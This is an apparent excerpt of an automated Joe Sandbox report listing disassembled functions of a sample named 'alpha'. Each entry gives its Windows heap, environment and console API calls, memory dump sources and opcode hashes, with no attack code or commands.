                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswspace
                                                                                                                    • String ID: off
                                                                                                                    • API String ID: 2389812497-733764931
                                                                                                                    • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                    • Instruction ID: 4c2d049b8317230979636cd0f06f7706517555cda64f6fa5b67687d150c12973
                                                                                                                    • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                    • Instruction Fuzzy Hash: 88216221E0C64B81FAA07F15A558279EEB0FF45FA6FE88034D90E47682EE2CE540C321
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE9308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                    • String ID: %s=%s$DPATH$PATH
                                                                                                                    • API String ID: 3731854180-3148396303
                                                                                                                    • Opcode ID: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                                                                                                    • Instruction ID: 0f46443378b8ac95238ad70f785bace2c89b26dcd92c0fd83b4df8ec5e125d4b
                                                                                                                    • Opcode Fuzzy Hash: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                                                                                                                    • Instruction Fuzzy Hash: F6218825B0964A80EA65BF95E444279EEB5BF80F82FE84135DD0E43395EE2CE448C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD09F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswspacewcschr
                                                                                                                    • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                                                    • API String ID: 287713880-1183017076
                                                                                                                    • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                    • Instruction ID: a6f7f1a48d9c4e2b2ac0407d9743ec9d055e20fd48c7c22173785eecfe9145b5
                                                                                                                    • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                    • Instruction Fuzzy Hash: 6DF04421A18A5E81FA609F51A408179EDB0FF44F42BE69131D95F43254EF2CD440C620
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC6A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BD3D0C
                                                                                                                      • Part of subcall function 00007FF789BD3C24: towupper.MSVCRT ref: 00007FF789BD3D2F
                                                                                                                      • Part of subcall function 00007FF789BD3C24: iswalpha.MSVCRT ref: 00007FF789BD3D4F
                                                                                                                      • Part of subcall function 00007FF789BD3C24: towupper.MSVCRT ref: 00007FF789BD3D75
                                                                                                                      • Part of subcall function 00007FF789BD3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD3DBF
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6ABF
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6AD3
                                                                                                                      • Part of subcall function 00007FF789BC6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF789BC6AE8,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B8B
                                                                                                                      • Part of subcall function 00007FF789BC6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF789BC6AE8,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B97
                                                                                                                      • Part of subcall function 00007FF789BC6B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF789BC6AE8,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6BAF
                                                                                                                      • Part of subcall function 00007FF789BC6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC6AF1,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B39
                                                                                                                      • Part of subcall function 00007FF789BC6B30: RtlFreeHeap.NTDLL(?,?,?,00007FF789BC6AF1,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B4D
                                                                                                                      • Part of subcall function 00007FF789BC6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC6AF1,?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925), ref: 00007FF789BC6B59
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6B03
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF789BEEA0F,?,?,?,00007FF789BEE925,?,?,?,?,00007FF789BCB9B1), ref: 00007FF789BC6B17
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3512109576-0
                                                                                                                    • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                    • Instruction ID: 499a986b80efaba2e0d50c16a232d259b7eb684a3b4a5ba82981e76a65746eb0
                                                                                                                    • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                    • Instruction Fuzzy Hash: 5C214F61A09A8AC6EB04AF65D4547B8BFB0FF59F4AFA44035DA0E07351EE2CA446C370
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCB6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB6D0
                                                                                                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB6E7
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB701
                                                                                                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB715
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$AllocSize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2549470565-0
                                                                                                                    • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                    • Instruction ID: c03c291cd66ed064ba149653c82924396b453e771240d14087ab0a3abbe3ee35
                                                                                                                    • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                    • Instruction Fuzzy Hash: B5213321A0969AC6EA54AF55E44007CFEB1FF88F96BE89431DA0E03790EF3CE545C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC59E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 22757656-0
                                                                                                                    • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                    • Instruction ID: 8a90d41b50c92e4d06614146a6bfc27181c422ceb85b6e7c9014d4731287b3ff
                                                                                                                    • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                    • Instruction Fuzzy Hash: A1112E71A1864987E7506F24E44837DBAB0FB89FA5FA44734D62A473D0DF3D9449CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE5690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE56C5
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE56D9
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE56FD
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE5711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3859560861-0
                                                                                                                    • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                    • Instruction ID: d047d02ab10545f19e0d7d112ef87390b93682f133160d4cbe0b4f02ebfff3d0
                                                                                                                    • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                    • Instruction Fuzzy Hash: CA11EC72A04B95CADB009F56E4440ADBBB0F75DF85B998135DB4E03B18EF38E456C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEF22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleMode_get_osfhandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1606018815-0
                                                                                                                    • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                    • Instruction ID: 2a60d51aa00c3d334817cc2f7f6f41368badf87669877e9b166c541aade4c68c
                                                                                                                    • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                    • Instruction Fuzzy Hash: E5F0F231A24A82CBD6046F10E844279BE70FB8AF43F95A228DA0A02394EF3CD008CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCCAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleTitle
                                                                                                                    • String ID: -
                                                                                                                    • API String ID: 3358957663-3695764949
                                                                                                                    • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                    • Instruction ID: 646374a0ed368522b8caf40984f5b25c294191b618e7bb202494354d1578c4da
                                                                                                                    • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                    • Instruction Fuzzy Hash: 80319021A0964A82EA44BF52A844078EEB4FF49FE6FA45535DE1E077D5DF3CE841C324
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD7280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsnicmpswscanf
                                                                                                                    • String ID: :EOF
                                                                                                                    • API String ID: 1534968528-551370653
                                                                                                                    • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                    • Instruction ID: 90a07ccb2dcd07cebf43d4d04d71ce76afb848d206f64974b86aacceafbfb006
                                                                                                                    • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                    • Instruction Fuzzy Hash: 5431A271A0D64A8AFB54BF55E4842B8FAB0FF45F62FE44031DA4D06290DF2CE942C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCB62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 3$3
                                                                                                                    • API String ID: 0-2538865259
                                                                                                                    • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                    • Instruction ID: 74c151d912120985f0b44087bde21283383c215998ff22fdaf03a9ee2c543326
                                                                                                                    • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                    • Instruction Fuzzy Hash: 46013931D0A58A8AF394BF61D888278FA70BF80B27FF40135D40E015A2DF2E6585CA60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD06C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06D6
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06F0
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD074D
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD0762
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1617791916-0
                                                                                                                    • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                    • Instruction ID: 359634feeda40882ccdad0a3af20f993fbffb9be1b8cb8178b33350d32e73de3
                                                                                                                    • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                    • Instruction Fuzzy Hash: 00413972A0968686EA55AF21E448179FBB0FF85F82FE48134DA4E07794DF3DE540CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%